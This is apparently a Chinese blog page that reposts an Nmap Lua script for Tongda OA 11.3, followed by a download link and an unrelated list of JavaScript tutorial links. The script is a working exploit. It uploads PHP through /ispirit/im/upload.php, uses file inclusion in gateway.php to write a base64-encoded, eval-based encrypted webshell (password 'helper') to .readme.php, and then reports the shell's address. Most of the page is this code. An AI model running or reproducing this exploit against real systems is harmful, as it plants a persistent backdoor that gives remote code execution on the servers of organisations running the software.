通达OA getshell | Nmap 脚本
时间:2022-07-23
本文章向大家介绍通达OA getshell | Nmap 脚本,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
local stdnse = require "stdnse"
local shortport = require "shortport"
local http = require "http"
local string = require "string"
local base64 = require "base64"
description = "TDOA upload & lfi"
author = "test94"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"default", "vuln", "intrusive"}
---
-- @usage
-- nmap <target> -p80 -Pn --script tdoa --scan-delay 1000ms
--
-- @output
-- PORT STATE SERVICE
-- 8080/tcp open http-proxy
-- | tdoa:
-- | result: not vulnerable
-- | webshell: 192.168.1.48:8080/ispirit/interface/.readme.php
-- |_ webshell_pass: helper
prerule = function()
print("-----------------------------------")
print("[+] TongdaOA upload & lfi Detecting ... ")
print("[-] (if port is filtered, noting will be checked)")
print("")
end
portrule = shortport.service({"http", "https", "afs3-callback", "http-proxy"})
local postdatas = [[
------WebKitFormBoundary
Content-Disposition: form-data; name="UPLOAD_MODE"
1
------WebKitFormBoundary
Content-Disposition: form-data; name="P"
1
------WebKitFormBoundary
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundary
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
<?php
$fp = fopen('.readme.php', 'w');
$a = base64_decode("PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9HRVRbJ2hlbHBlciddKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bJ2snXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWydrJ107CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCdvcGVuc3NsJykpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoJ3wnLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4=");
fwrite($fp, $a);
fclose($fp);
?>
------WebKitFormBoundary--
]]
action = function(host, port)
local output = stdnse.output_table()
output.result = "not vulnerable"
local options = {header = {}, content={}}
options["header"]["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3100.0 Safari/537.36"
options["header"]["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
options["header"]["Accept-Encoding"] = "gzip, deflate"
options["header"]["Accept-Language"] = "en-US,en;q=0.5"
options["header"]["Connection"] = "keep-alive"
options["header"]["Upgrade-Insecure-Requests"] = 1
options["header"]["Content-Type"] = "multipart/form-data; boundary=----WebKitFormBoundary"
options["content"] = postdatas
local input_shell_request = http.post(host, port, "/ispirit/im/upload.php", options)
local file_include = string.match(input_shell_request.body, "@2003_(.-)%|") .. ".jpg"
options["header"]["Content-Type"] = "multipart/form-data"
options["content"] = nil
local include_url = '/ispirit/interface/gateway.php?json={"url":"//general/../../attach/im/2003/'..file_include..'"}'
local all_requests = http.pipeline_add(include_url, options, nil, "GET")
all_requests = http.pipeline_add("/ispirit/interface/.readme.php", options, all_requests, "GET")
local all_response = http.pipeline_go(host, port, all_requests)
if all_response[2]['status'] == 200 then
output.webshell = host.ip .. ":" .. port.number .. "/ispirit/interface/.readme.php"
output.webshell_pass = "helper"
end
return output
end
适用于通达OA最新版:11.3
http://www.tongda2000.com/download/2019.php?F=baidu_natural&K=
参考文章
https://github.com/jas502n/OA-tongda-RCE
脚本下载地址:
http://www.my-synology.cn:37980/sharing/TadkxqVi6
密码: helper
- Linux下如何查看自己的服务器有没有无线网卡
- WAMP配置虚拟主机
- linux开关端口问题
- Python 3.6实现单博主微博文本、图片及热评爬取
- 用Django实现一个可运行的区块链应用
- Python的dict实现原理及与Java的比较探究
- 关于位域如何节省内存(C++)
- mysql的小知识点(关于数据库的导入导出 对于windows)
- Python网络编程中的套接字名和DNS解析
- hdu 4009 Transfer water(最小型树图)
- NumPy二元运算的broadcasting机制
- md5算法原理一窥(其一)
- 实现属于自己的TensorFlow(一) - 计算图与前向传播
- 基于Sanic的微服务基础架构
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法